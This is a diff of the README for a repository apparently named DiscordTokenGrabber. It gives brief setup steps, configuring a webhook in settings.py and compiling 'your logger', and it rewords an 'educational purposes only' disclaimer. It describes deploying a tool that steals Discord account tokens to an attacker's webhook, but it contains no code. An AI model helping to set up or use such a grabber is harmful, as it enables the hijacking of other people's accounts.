darraghd493/DiscordTokenGrabber/README.md

 * Configure your settings.py file to use a webhook and post to yours.
 * Compile your logger!

 *Please note that this is only for educational purposes and is not be used.
-This is only to display how easy you Discord tokens can be compromised and is not designed to be used as a legitimate tool.*
+This is only to display how easy you Discord tokens can be compromised and is not designed to be used.*